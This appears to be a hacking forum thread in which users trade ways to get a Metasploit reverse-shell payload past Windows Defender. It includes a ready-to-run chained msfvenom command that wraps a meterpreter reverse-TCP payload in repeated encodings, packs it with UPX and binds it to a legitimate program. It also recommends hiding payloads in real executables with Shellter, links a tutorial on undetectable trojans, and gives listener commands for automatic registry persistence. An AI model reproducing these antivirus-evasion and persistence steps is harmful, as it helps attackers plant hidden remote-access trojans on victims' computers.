Forum Thread: Windows Defender Pick Up My Payload

Use veil-evasion, very similar to msfvenom. In my experience much higher success rate with veil-evasion against AV.

i dont know why but veil-evasion cant pass my windows defender

Well, the most straight forward solution would be to create your own shellcode and embed it into a legit software(i.e. PuTTy). But, what else you can do is to encode it multiple times( like this:

msfvenom -p windows/meterpreter/reversetcp LHOST= LPORT=31337 -f raw -e shikataganai -i 5 | msfvenom -a x86 --platform windows -e x86/alphaupper -i 4 -f raw | msfvenom -a x86 --platform windows -e x86/shikataganai -i 6 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 5 -f raw | msfvenom -a x86 --platform windows -e x86/shikataganai -i 9 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 9 -f exe -o /root/.exe;upx -9 -v -o /root/.exe /root/.exe)

and add a -k option and add a program of your choice to run with the payload.

tried the script... windows defender still eats it up... any other suggestions?

Have you checked out my tutorial? Instead of Msfvenom or Veil, use Metasploit to create a raw payload. Then use Shellter with either a created exe you create in Windows, or another 32bit exe with your payload created by Metasploit. https://null-byte.wonderhowto.com/how-to/create-undetectable-trojan-using-domain-name-0171563/

combining the payload with a legitimate exe will get past defender. however persistence connection (as far as i know) requires the payload to be uncombined and THAT gets chewed up by defender. any other ideas?

For persistence, use the Registry persistence exploit. Found in Exploit/Windows/Local/registry (underscore) persistence

I like to set it up in the listener so it automatically gets persistence when a session is created. After typing your listener info and before typing exploit -j , type set autorunscript exploit/windows/local /registry-persistence Lhost=IP Lport=port

Then exploit -j